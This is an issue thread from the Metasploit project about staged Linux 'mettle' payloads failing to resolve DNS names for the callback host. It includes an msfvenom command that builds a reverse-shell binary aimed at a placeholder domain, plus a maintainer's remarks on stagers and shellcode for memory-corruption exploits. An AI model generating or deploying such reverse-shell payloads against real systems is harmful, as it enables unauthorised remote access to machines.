staged mettle, meterpreter and other Linux shellcode cannot resolve dns in victim

[huxinyi718]

Steps to reproduce

1. msfvenom -p linux/mipsle/mettle/reverse_tcp LHOST=example.domain LPORT=4444 -f elf -o /tmp/elf

Expected behavior

It should start an reverse shell to the domain

Current behavior

mettle exit with "Segmentation fault"

I use tcpdump port 53 in victim ,but noting

System stuff

Metasploit version

4.14.10-dev

I installed Metasploit with:

• [ ] Kali package via apt
• [ ] Omnibus installer (nightly)
• [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
• [ ] Source install (please specify ruby version)

OS

Kali2

[busterb]

Please try the stageless version instead, which will do DNS resolution: linux/mipsle/mettle_reverse_tcp

The staged version does not do DNS resolution because that's how the stager works - it is minimal shellcode to load the main stage, and in this case Metasploit will try to do the DNS resolution itself and embed the IP address instead. Changing this requires a change to the general stager shellcode, and would be best to do across all architectures if possible. It's not a specific mettle problem, but in almost any of our staged Linux shellcode works the same way.

[huxinyi718]

Yes. Stagedless payload works well. But are there some easy ways to make staged mettle do the DNS resolutionin ?

[busterb]

easy is relative. we could make a script-based stager that uses python, perl, php, or shell(wget/curl) to do the injection. That's pretty much what the command stagers do already.

If you want a native shellcode blob suitable for using in a BoF, etc, someone just needs to write the shellcode for it. Add a couple of syscalls for doing the name resolution, and some struct manipulation. Are you still going to be dropping a stager executable, or are you taking advantage of memory corruption?